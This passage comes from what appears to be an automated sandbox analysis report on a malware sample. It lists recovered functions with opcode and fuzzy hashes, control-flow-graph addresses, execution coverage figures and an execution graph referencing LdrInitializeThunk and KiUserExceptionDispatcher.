                                                  • Opcode Fuzzy Hash: 1747e08ea4903e2e0211094ab7d590311e80ee6ce9271d989500017a00887296
                                                  • Instruction Fuzzy Hash: 5631B9B4D002189FDF14CFA9D984AEEFBB5AB49310F24942AE818B7300D775A905CFA4
                                                  Function 0012D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.387694405.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_12d000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0fc86ad1fa86abffedfc985181da7047b7b3f5f52f514d625c41103f01a1187
                                                  • Instruction ID: a4a54a265bd7552f149f4069b7738cf577ee727603db4984961b08f9061a33fa
                                                  • Opcode Fuzzy Hash: e0fc86ad1fa86abffedfc985181da7047b7b3f5f52f514d625c41103f01a1187
                                                  • Instruction Fuzzy Hash: 7C21F275604340DFDB14CF24F8C4B26BB65EB88314F30C569E8494B266C33AD857CBA6
                                                  Function 0012D006 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.387694405.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_12d000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8453d019d7932e9c833bd6c9694279589d035ebcb0b2430d55508f1fd20be97b
                                                  • Instruction ID: 4c80d842b18f5e3845d7515a7a8ba5a106862de5a27ee21bee0e43af490cc74c
                                                  • Opcode Fuzzy Hash: 8453d019d7932e9c833bd6c9694279589d035ebcb0b2430d55508f1fd20be97b
                                                  • Instruction Fuzzy Hash: 542150755083809FCB12CF24E994B15BF71EF46314F28C5DAD8498F267C33A985ACBA2

                                                  Non-executed Functions

                                                  Function 0017B160 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 835dc7347243c3d8d996f60a1d61bddb92bc0d2f394a8c996666c7416be7c553
                                                  • Instruction ID: 5dbd54c60a523b6bea9d63c407d2d4a157814c55bf3d4e3a59599f5931570f2b
                                                  • Opcode Fuzzy Hash: 835dc7347243c3d8d996f60a1d61bddb92bc0d2f394a8c996666c7416be7c553
                                                  • Instruction Fuzzy Hash: 76E11774E04259CFDB14DFA9C580AADFBB2BF89300F248169D819AB356D730AD41DF60
                                                  Function 0017A408 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cac131cd1ca2042eae2f0267852994bd48531faa19aeaeecf220edaba2dae62c
                                                  • Instruction ID: cca51acecc4197d71cba51f1fd1863c2f03466d87979a50ee6fefa88f74e4113
                                                  • Opcode Fuzzy Hash: cac131cd1ca2042eae2f0267852994bd48531faa19aeaeecf220edaba2dae62c
                                                  • Instruction Fuzzy Hash: 61E11974E142598FDB14DFA8C580AADFBB2BF88301F24C169D818AB356D731AD41DFA1
                                                  Function 0017B598 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 668298c0bdae6a14bc5b2526c46a84543d18aef7f2f33910e7b094823e7787c6
                                                  • Instruction ID: 6b0cc6905c4b7172cfb987c9704b66e998655e36d2521b3451ef7abbd2c3bb09
                                                  • Opcode Fuzzy Hash: 668298c0bdae6a14bc5b2526c46a84543d18aef7f2f33910e7b094823e7787c6
                                                  • Instruction Fuzzy Hash: 5BE12B74E042598FDB14DFA8C580AAEBBB2BF88305F24C169D918A7355D730AD41DFA0
                                                  Function 0017A840 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07d751c807fa437dfc2863c26091adae4f3440bf0cf3eea0a77d6258ed082ce6
                                                  • Instruction ID: 47fdfa69990f2d63c00534d4522bd31042482337950ef81f22d277222582426e
                                                  • Opcode Fuzzy Hash: 07d751c807fa437dfc2863c26091adae4f3440bf0cf3eea0a77d6258ed082ce6
                                                  • Instruction Fuzzy Hash: AEE11774E002598FDB14DFA8C580AADFBB2BF88305F24C169D819AB356D730AD41DFA1
                                                  Function 0017AC78 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5095606b0fd67bed1c42145e53d46359b938dd5540f11ddd45a8d2e4dcc68fa9
                                                  • Instruction ID: 3aba793ff5f96ff5e9f9da141f74f2bb90a3d23619b49e08bfeea9760b7aefdc
                                                  • Opcode Fuzzy Hash: 5095606b0fd67bed1c42145e53d46359b938dd5540f11ddd45a8d2e4dcc68fa9
                                                  • Instruction Fuzzy Hash: 23E11A74E042598FDB14DFA8C590AAEFBB2BF88301F24C169D818A7356DB31AD41DF61
                                                  Function 0017B588 Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 418d074d3af67869bc2efd730d58b02d42ca1b9b43d63aa02f3071e5141d3918
                                                  • Instruction ID: 99d9eef3b900c0ce237ff7c6cdad048d7df8966d31b26bb205b780f21dfc65b3
                                                  • Opcode Fuzzy Hash: 418d074d3af67869bc2efd730d58b02d42ca1b9b43d63aa02f3071e5141d3918
                                                  • Instruction Fuzzy Hash: 0D511AB4E042598FDB18CFA9C580AAEFBF2BF89304F24C169D418AB355D7309941CFA0
                                                  Function 0017B152 Relevance: .1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.388981647.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_170000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3241b6dfed8214855211ff7996ce7b1f456d83d751fa6af7971ce230536adc32
                                                  • Instruction ID: cbe2fb7d980f0d2fbb0cfbedf63f92b353155fcd6c3925e183a76105e9070054
                                                  • Opcode Fuzzy Hash: 3241b6dfed8214855211ff7996ce7b1f456d83d751fa6af7971ce230536adc32
                                                  • Instruction Fuzzy Hash: 6B511974E042598FDB14CFA9C5806AEFBF2BF89300F24C169D418A7356D7319941CF61

                                                  Execution Graph

                                                  Execution Coverage:5.8%
                                                  Dynamic/Decrypted Code Coverage:83.6%
                                                  Signature Coverage:15.1%
                                                  Total number of Nodes:73
                                                  Total number of Limit Nodes:0
                                                  execution_graph 32712 1c5500 32713 1c550c 32712->32713 32725 1c903a 32713->32725 32715 1c57d4 32749 8b4325 32715->32749 32755 8b4330 32715->32755 32716 1c58e5 32761 709640 32716->32761 32767 709634 32716->32767 32717 1c5c18 32727 1c906a 32725->32727 32726 1c55ab 32737 718738 32726->32737 32743 718748 32726->32743 32727->32726 32773 1cdec8 32727->32773 32777 1ce2ab 32727->32777 32781 1cdeb9 32727->32781 32728 1c91bb KiUserExceptionDispatcher 32729 1c9136 32728->32729 32729->32726 32729->32728 32785 8d2cef 32729->32785 32789 8d2c73 32729->32789 32793 8d2ac9 32729->32793 32797 8d2ad8 32729->32797 32738 71876a 32737->32738 32739 71883d 32738->32739 32740 1cdec8 LdrInitializeThunk 32738->32740 32741 1cdeb9 LdrInitializeThunk 32738->32741 32742 1ce2ab LdrInitializeThunk 32738->32742 32739->32715 32740->32739 32741->32739 32742->32739 32744 71876a 32743->32744 32745 71883d 32744->32745 32746 1cdec8 LdrInitializeThunk 32744->32746 32747 1cdeb9 LdrInitializeThunk 32744->32747 32748 1ce2ab LdrInitializeThunk 32744->32748 32745->32715 32746->32745 32747->32745 32748->32745 32750 8b432c 32749->32750 32751 8b43f7 32750->32751 32752 1cdec8 LdrInitializeThunk 32750->32752 32753 1cdeb9 LdrInitializeThunk 32750->32753 32754 1ce2ab LdrInitializeThunk 32750->32754 32751->32716 32752->32751 32753->32751 32754->32751 32756 8b434c 32755->32756 32757 8b43f7 32756->32757 32758 1cdec8 LdrInitializeThunk 32756->32758 32759 1cdeb9 LdrInitializeThunk 32756->32759 32760 1ce2ab LdrInitializeThunk 32756->32760 32757->32716 32758->32757 32759->32757 32760->32757 32762 70965c 32761->32762 32763 709707 32762->32763 32764 1cdec8 LdrInitializeThunk 32762->32764 32765 1cdeb9 LdrInitializeThunk 32762->32765 32766 1ce2ab LdrInitializeThunk 32762->32766 32763->32717 32764->32763 32765->32763 32766->32763 32768 709640 32767->32768 32769 709707 32768->32769 32770 1cdec8 LdrInitializeThunk 32768->32770 32771 1cdeb9 LdrInitializeThunk 32768->32771 32772 1ce2ab LdrInitializeThunk 32768->32772 32769->32717 32770->32769 32771->32769 32772->32769 32775 1cdef9 32773->32775 32774 1ce059 32774->32729 32775->32774 32776 1ce3e8 LdrInitializeThunk 32775->32776 32776->32774 32779 1ce163 LdrInitializeThunk 32777->32779 32780 1ce400 32779->32780 32780->32729 32784 1cdec0 32781->32784 32782 1ce059 32782->32729 32783 1ce3e8 LdrInitializeThunk 32783->32782 32784->32782 32784->32783 32786 8d2c1b 32785->32786 32787 8d2b37 32785->32787 32786->32729 32787->32786 32788 8d2c2a LdrInitializeThunk 32787->32788 32788->32786 32790 8d2b37 32789->32790 32791 8d2c1b 32790->32791 32792 8d2c2a LdrInitializeThunk 32790->32792 32791->32729 32792->32791 32795 8d2aff 32793->32795 32794 8d2c2a LdrInitializeThunk 32796 8d2c1b 32794->32796 32795->32794 32795->32796 32796->32729 32799 8d2aff 32797->32799 32798 8d2c2a LdrInitializeThunk 32800 8d2c1b 32798->32800 32799->32798 32799->32800 32800->32729

                                                  Executed Functions

                                                  Function 001CDEC8 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 956 1cdec8-1cdef7 957 1cdefe-1cdf94 956->957 958 1cdef9 956->958 960 1ce033-1ce039 957->960 958->957 961 1ce03f-1ce057 960->961 962 1cdf99-1cdfac 960->962 963 1ce059-1ce066 961->963 964 1ce06b-1ce07e 961->964 965 1cdfae 962->965 966 1cdfb3-1cdfbd 962->966 967 1ce400-1ce4fc 963->967 968 1ce085-1ce0a1 964->968 969 1ce080 964->969 965->966 973 1cdfc4-1ce004 966->973 974 1ce4fe-1ce503 967->974 975 1ce504-1ce50e 967->975 970 1ce0a8-1ce0cc 968->970 971 1ce0a3 968->971 969->968 979 1ce0ce 970->979 980 1ce0d3-1ce105 970->980 971->970 982 1ce006-1ce014 973->982 983 1ce017-1ce029 973->983 974->975 979->980 988 1ce10c-1ce14e 980->988 989 1ce107 980->989 982->961 985 1ce02b 983->985 986 1ce030 983->986 985->986 986->960 991 1ce155-1ce15e 988->991 992 1ce150 988->992 989->988 993 1ce385-1ce38b 991->993 992->991 994 1ce391-1ce3a4 993->994 995 1ce163-1ce188 993->995 996 1ce3ab-1ce3c6 994->996 997 1ce3a6 994->997 998 1ce18f-1ce1c5 995->998 999 1ce18a 995->999 1000 1ce3cd-1ce3e1 996->1000 1001 1ce3c8 996->1001 997->996 1007 1ce1cc-1ce1fe 998->1007 1008 1ce1c7 998->1008 999->998 1004 1ce3e8-1ce3fe LdrInitializeThunk 1000->1004 1005 1ce3e3 1000->1005 1001->1000 1004->967 1005->1004 1010 1ce200-1ce225 1007->1010 1011 1ce262-1ce275 1007->1011 1008->1007 1012 1ce22c-1ce25a 1010->1012 1013 1ce227 1010->1013 1014 1ce27c-1ce2a1 1011->1014 1015 1ce277 1011->1015 1012->1011 1013->1012 1018 1ce2b0-1ce2e8 1014->1018 1019 1ce2a3-1ce2a4 1014->1019 1015->1014 1020 1ce2ef-1ce350 1018->1020 1021 1ce2ea 1018->1021 1019->994 1026 1ce357-1ce37b 1020->1026 1027 1ce352 1020->1027 1021->1020 1030 1ce37d 1026->1030 1031 1ce382 1026->1031 1027->1026 1030->1031 1031->993
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e01946830a4de008a78b867efbd0615c7302b1e6511b0a3ed9a7409e66449c46
                                                  • Instruction ID: b06cd50d5d1591a6df42353bbbd3c45a2e1d4628213421a58730e88133fe1dbb
                                                  • Opcode Fuzzy Hash: e01946830a4de008a78b867efbd0615c7302b1e6511b0a3ed9a7409e66449c46
                                                  • Instruction Fuzzy Hash: 77F1E474E01218CFDB14DFA9C884B9DFBB2BF98304F5485A9E808AB355DB74A985CF50
                                                  Function 001C6728 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1032 1c6728-1c6748 1033 1c674f-1c693b call 1c0374 * 4 1032->1033 1034 1c674a 1032->1034 1055 1c7199-1c71af 1033->1055 1034->1033 1056 1c71b5-1c71f3 1055->1056 1057 1c6940-1c6949 1055->1057 1058 1c694b 1057->1058 1059 1c6950-1c696e 1057->1059 1058->1059 1061 1c718c-1c7192 1059->1061 1062 1c6974-1c6996 call 1c37e8 1059->1062 1061->1055 1063 1c7194 1061->1063 1068 1c716f-1c7185 1062->1068 1063->1055 1069 1c699b-1c69a4 1068->1069 1070 1c718b 1068->1070 1071 1c69ab-1c6aca call 1c0374 call 1c0394 * 5 1069->1071 1072 1c69a6 1069->1072 1070->1061 1086 1c6acf-1c6afc 1071->1086 1072->1071 1087 1c7132-1c7151 1086->1087 1088 1c6b02-1c6b0e 1086->1088 1093 1c7160 1087->1093 1094 1c7153-1c715f 1087->1094 1089 1c6bae-1c6bc4 1088->1089 1091 1c6bca-1c6c90 call 1c0394 1089->1091 1092 1c6b13-1c6b1c 1089->1092 1114 1c6c97-1c6cf2 1091->1114 1115 1c6c92 1091->1115 1095 1c6b1e 1092->1095 1096 1c6b23-1c6b54 call 1c0394 1092->1096 1093->1068 1094->1093 1095->1096 1102 1c6b98-1c6ba4 1096->1102 1103 1c6b56-1c6b97 call 1c0394 1096->1103 1105 1c6bab 1102->1105 1106 1c6ba6 1102->1106 1103->1102 1105->1089 1106->1105 1117 1c6cf9-1c6cfd 1114->1117 1118 1c6cf4 1114->1118 1115->1114 1119 1c6d0d-1c6d17 1117->1119 1120 1c6cff-1c6d0b 1117->1120 1118->1117 1122 1c6d1e-1c6d3e 1119->1122 1123 1c6d19 1119->1123 1121 1c6d44-1c6dd6 call 1c0394 1120->1121 1130 1c6ddc-1c6e6c 1121->1130 1131 1c6f72-1c6f99 1121->1131 1122->1121 1123->1122 1139 1c6e6e 1130->1139 1140 1c6e73-1c6ece 1130->1140 1134 1c6f9a-1c7131 1131->1134 1134->1087 1139->1140 1143 1c6ed5-1c6ed9 1140->1143 1144 1c6ed0 1140->1144 1145 1c6ee9-1c6ef3 1143->1145 1146 1c6edb-1c6ee7 1143->1146 1144->1143 1149 1c6efa-1c6f1a 1145->1149 1150 1c6ef5 1145->1150 1148 1c6f20-1c6f70 1146->1148 1148->1134 1149->1148 1150->1149
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &55p
                                                  • API String ID: 0-1955183375
                                                  • Opcode ID: ee6c51308f10436ffe4b6381e76cba30df9b229c095825f6f8e0ed3693625805
                                                  • Instruction ID: 2d4369c067dc2c59c0cd3f4e59c1ed9dd610733beda71e5c8075ff34a446f0ae
                                                  • Opcode Fuzzy Hash: ee6c51308f10436ffe4b6381e76cba30df9b229c095825f6f8e0ed3693625805
                                                  • Instruction Fuzzy Hash: 2A529C74A01268CFDB64DF65C884BADBBB2BF99300F1085EAD409AB355DB359E81CF50
                                                  Function 001C903A Relevance: 1.8, APIs: 1, Instructions: 271COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1167 1c903a-1c9068 1168 1c906f-1c9100 1167->1168 1169 1c906a 1167->1169 1173 1c9106-1c9116 1168->1173 1174 1c9452-1c9484 1168->1174 1169->1168 1222 1c9119 call 1c94a8 1173->1222 1223 1c9119 call 1c97ea 1173->1223 1177 1c911f-1c912e 1224 1c9130 call 1cdec8 1177->1224 1225 1c9130 call 1cdeb9 1177->1225 1226 1c9130 call 1ce2ab 1177->1226 1178 1c9136-1c9152 1180 1c9159-1c9162 1178->1180 1181 1c9154 1178->1181 1182 1c9445-1c944b 1180->1182 1181->1180 1183 1c9167-1c9173 1182->1183 1184 1c9451 1182->1184 1227 1c9175 call 8d2cef 1183->1227 1228 1c9175 call 8d2ac9 1183->1228 1229 1c9175 call 8d2ad8 1183->1229 1230 1c9175 call 8d2c73 1183->1230 1184->1174 1185 1c917b-1c91e1 KiUserExceptionDispatcher 1188 1c929d-1c92f8 1185->1188 1189 1c91e7-1c9255 call 1c3858 1185->1189 1201 1c92f9-1c9347 1188->1201 1199 1c9298-1c929b 1189->1199 1200 1c9257-1c9297 1189->1200 1199->1201 1200->1199 1206 1c934d-1c942f 1201->1206 1207 1c9430-1c943b 1201->1207 1206->1207 1209 1c943d 1207->1209 1210 1c9442 1207->1210 1209->1210 1210->1182 1222->1177 1223->1177 1224->1178 1225->1178 1226->1178 1227->1185 1228->1185 1229->1185 1230->1185
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 001C91CD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 9a6296d98aea761166231c5b8e619a872b97b078f554bd385b2036e20157a51a
                                                  • Instruction ID: 0bf74751003ceb1fcee3caf4b9ea2cc40df2167c032c864d768d8c4097808ca6
                                                  • Opcode Fuzzy Hash: 9a6296d98aea761166231c5b8e619a872b97b078f554bd385b2036e20157a51a
                                                  • Instruction Fuzzy Hash: FBD1B074E01218CFEB54DFA5C994B9DBBB2BF89300F2484A9D809AB355DB359E81CF50
                                                  Function 00940040 Relevance: .7, Instructions: 745COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1787 940040-940060 1788 940067-9400df 1787->1788 1789 940062 1787->1789 1793 9400e1-940127 1788->1793 1794 94012c-94017e 1788->1794 1789->1788 1801 9401c5-940278 1793->1801 1794->1801 1802 940180-9401c4 1794->1802 1812 940283-9402a9 1801->1812 1802->1801 1814 940e5e-940e93 1812->1814 1815 9402af-9403b1 1812->1815 1825 940e51-940e57 1815->1825 1826 9403b6-940493 1825->1826 1827 940e5d 1825->1827 1835 940495 1826->1835 1836 94049a-940502 1826->1836 1827->1814 1835->1836 1840 940504 1836->1840 1841 940509-94051a 1836->1841 1840->1841 1842 9405a6-9406ac 1841->1842 1843 940520-94052a 1841->1843 1861 9406b3-94071b 1842->1861 1862 9406ae 1842->1862 1844 940531-9405a5 1843->1844 1845 94052c 1843->1845 1844->1842 1845->1844 1866 940722-940733 1861->1866 1867 94071d 1861->1867 1862->1861 1868 9407bf-940972 1866->1868 1869 940739-940743 1866->1869 1867->1866 1890 940974 1868->1890 1891 940979-9409f6 1868->1891 1870 940745 1869->1870 1871 94074a-9407be 1869->1871 1870->1871 1871->1868 1890->1891 1895 9409fd-940a0e 1891->1895 1896 9409f8 1891->1896 1897 940a14-940a1e 1895->1897 1898 940a9a-940b33 1895->1898 1896->1895 1899 940a25-940a99 1897->1899 1900 940a20 1897->1900 1908 940b35 1898->1908 1909 940b3a-940bb1 1898->1909 1899->1898 1900->1899 1908->1909 1916 940bb3 1909->1916 1917 940bb8-940bc9 1909->1917 1916->1917 1918 940cb6-940d4a 1917->1918 1919 940bcf-940c63 1917->1919 1928 940d50-940e3b 1918->1928 1929 940e3c-940e47 1918->1929 1933 940c65 1919->1933 1934 940c6a-940cb5 1919->1934 1928->1929 1930 940e4e 1929->1930 1931 940e49 1929->1931 1930->1825 1931->1930 1933->1934 1934->1918
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65453a610be821866d2aabe72671d66f916fa486734fc56c0eb75924d306bfd0
                                                  • Instruction ID: 20ab43075ec67660aed2b6393dfb1394860542a4ffd5b814fb19178f253931c7
                                                  • Opcode Fuzzy Hash: 65453a610be821866d2aabe72671d66f916fa486734fc56c0eb75924d306bfd0
                                                  • Instruction Fuzzy Hash: CA827D74E012298FDB64DF69CD98BDDBBB2AB89300F1481EAD50DA7255DB305E81CF80
                                                  Function 001C7200 Relevance: .7, Instructions: 718COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1949 1c7200-1c7230 1950 1c7237-1c72b9 1949->1950 1951 1c7232 1949->1951 1953 1c731e-1c7334 1950->1953 1951->1950 1954 1c72bb-1c72c4 1953->1954 1955 1c7336-1c7380 call 1c0374 1953->1955 1956 1c72cb-1c7314 call 1c418c 1954->1956 1957 1c72c6 1954->1957 1964 1c73eb-1c73ec 1955->1964 1965 1c7382-1c73c3 call 1c0394 1955->1965 1966 1c731b 1956->1966 1967 1c7316 1956->1967 1957->1956 1969 1c73ed-1c741e 1964->1969 1974 1c73e5-1c73e6 1965->1974 1975 1c73c5-1c73e3 1965->1975 1966->1953 1967->1966 1973 1c7425-1c748c 1969->1973 1981 1c7dde-1c7e13 1973->1981 1982 1c7492-1c74b3 1973->1982 1976 1c73e7-1c73e9 1974->1976 1975->1976 1976->1969 1985 1c7dbb-1c7dd7 1982->1985 1986 1c7ddd 1985->1986 1987 1c74b8-1c74c1 1985->1987 1986->1981 1988 1c74c8-1c752e call 1c3810 1987->1988 1989 1c74c3 1987->1989 1994 1c7535-1c75bf call 1c3820 1988->1994 1995 1c7530 1988->1995 1989->1988 2002 1c75d1-1c75d8 1994->2002 2003 1c75c1-1c75c8 1994->2003 1995->1994 2006 1c75df-1c75ec 2002->2006 2007 1c75da 2002->2007 2004 1c75cf 2003->2004 2005 1c75ca 2003->2005 2004->2006 2005->2004 2008 1c75ee 2006->2008 2009 1c75f3-1c75fa 2006->2009 2007->2006 2008->2009 2010 1c75fc 2009->2010 2011 1c7601-1c7658 2009->2011 2010->2011 2014 1c765f-1c7676 2011->2014 2015 1c765a 2011->2015 2016 1c7678-1c767f 2014->2016 2017 1c7681-1c7689 2014->2017 2015->2014 2018 1c768a-1c7694 2016->2018 2017->2018 2019 1c769b-1c76a4 2018->2019 2020 1c7696 2018->2020 2021 1c7d8b-1c7d91 2019->2021 2020->2019 2022 1c76a9-1c76b5 2021->2022 2023 1c7d97-1c7db1 2021->2023 2024 1c76bc-1c76c1 2022->2024 2025 1c76b7 2022->2025 2031 1c7db8 2023->2031 2032 1c7db3 2023->2032 2026 1c7704-1c7706 2024->2026 2027 1c76c3-1c76cf 2024->2027 2025->2024 2033 1c770c-1c7720 2026->2033 2029 1c76d6-1c76db 2027->2029 2030 1c76d1 2027->2030 2029->2026 2034 1c76dd-1c76ea 2029->2034 2030->2029 2031->1985 2032->2031 2035 1c7d69-1c7d76 2033->2035 2036 1c7726-1c773b 2033->2036 2037 1c76ec 2034->2037 2038 1c76f1-1c7702 2034->2038 2041 1c7d77-1c7d81 2035->2041 2039 1c773d 2036->2039 2040 1c7742-1c77c8 2036->2040 2037->2038 2038->2033 2039->2040 2048 1c77ca-1c77f0 2040->2048 2049 1c77f2 2040->2049 2042 1c7d88 2041->2042 2043 1c7d83 2041->2043 2042->2021 2043->2042 2050 1c77fc-1c781c 2048->2050 2049->2050 2052 1c799b-1c79a0 2050->2052 2053 1c7822-1c782c 2050->2053 2056 1c7a04-1c7a06 2052->2056 2057 1c79a2-1c79c2 2052->2057 2054 1c782e 2053->2054 2055 1c7833-1c785c 2053->2055 2054->2055 2058 1c785e-1c7868 2055->2058 2059 1c7876-1c7878 2055->2059 2060 1c7a0c-1c7a2c 2056->2060 2067 1c79ec 2057->2067 2068 1c79c4-1c79ea 2057->2068 2062 1c786f-1c7875 2058->2062 2063 1c786a 2058->2063 2064 1c7917-1c7926 2059->2064 2065 1c7a32-1c7a3c 2060->2065 2066 1c7d63-1c7d64 2060->2066 2062->2059 2063->2062 2069 1c792d-1c7932 2064->2069 2070 1c7928 2064->2070 2071 1c7a3e 2065->2071 2072 1c7a43-1c7a6c 2065->2072 2073 1c7d65-1c7d67 2066->2073 2074 1c79f6-1c7a02 2067->2074 2068->2074 2075 1c795c-1c795e 2069->2075 2076 1c7934-1c7944 2069->2076 2070->2069 2071->2072 2077 1c7a6e-1c7a78 2072->2077 2078 1c7a86-1c7a94 2072->2078 2073->2041 2074->2060 2083 1c7964-1c7978 2075->2083 2081 1c794b-1c795a 2076->2081 2082 1c7946 2076->2082 2084 1c7a7f-1c7a85 2077->2084 2085 1c7a7a 2077->2085 2079 1c7b33-1c7b42 2078->2079 2086 1c7b49-1c7b4e 2079->2086 2087 1c7b44 2079->2087 2081->2083 2082->2081 2088 1c787d-1c7898 2083->2088 2089 1c797e-1c7996 2083->2089 2084->2078 2085->2084 2090 1c7b78-1c7b7a 2086->2090 2091 1c7b50-1c7b60 2086->2091 2087->2086 2092 1c789f-1c7909 2088->2092 2093 1c789a 2088->2093 2089->2073 2096 1c7b80-1c7b94 2090->2096 2094 1c7b67-1c7b76 2091->2094 2095 1c7b62 2091->2095 2107 1c790b 2092->2107 2108 1c7910-1c7916 2092->2108 2093->2092 2094->2096 2095->2094 2097 1c7a99-1c7ab4 2096->2097 2098 1c7b9a-1c7c03 2096->2098 2100 1c7abb-1c7b25 2097->2100 2101 1c7ab6 2097->2101 2110 1c7c0c-1c7d5f 2098->2110 2111 1c7c05-1c7c07 2098->2111 2115 1c7b2c-1c7b32 2100->2115 2116 1c7b27 2100->2116 2101->2100 2107->2108 2108->2064 2112 1c7d60-1c7d61 2110->2112 2111->2112 2112->2023 2115->2079 2116->2115
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44b5f956f36fc27b896df11f103fcfe776700f3e167aa5261e296d7d8f162834
                                                  • Instruction ID: 4c8eca0fd33c8b675675916f33f659cb5bb1551ca847615dc406e710c958f6d9
